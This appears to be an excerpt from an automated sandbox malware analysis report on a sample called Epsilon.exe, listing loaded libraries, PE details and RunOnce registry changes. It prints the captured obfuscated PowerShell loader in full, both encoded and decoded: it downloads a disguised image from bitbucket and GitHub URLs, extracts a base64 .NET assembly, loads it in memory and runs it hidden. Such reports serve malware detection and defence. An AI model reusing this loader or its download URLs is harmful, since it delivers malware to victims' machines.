        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Epsilon.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: Epsilon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: Epsilon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: Epsilon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: Epsilon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Epsilon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: Epsilon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: Epsilon.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Epsilon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: wextract.pdb source: Epsilon.exe
        Source: Binary string: wextract.pdbGCTL source: Epsilon.exe
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 00000007.00000002.2169777517.000001A1DA5D0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdbG_a_ S__CorExeMainmscoree.dll source: powershell.exe, 00000007.00000002.2169777517.000001A1DA5D0000.00000004.08000000.00040000.00000000.sdmp
        Source: Epsilon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: Epsilon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: Epsilon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: Epsilon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: Epsilon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        barindex
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$
        Suspicious powershell command line found
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: Epsilon.exeStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF7378230EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7378230EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D5171A pushfd ; ret 5_2_00007FF848D5172A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D500BD pushad ; iretd 5_2_00007FF848D500C1
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737821684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF737821684
        Source: C:\Users\user\Desktop\Epsilon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
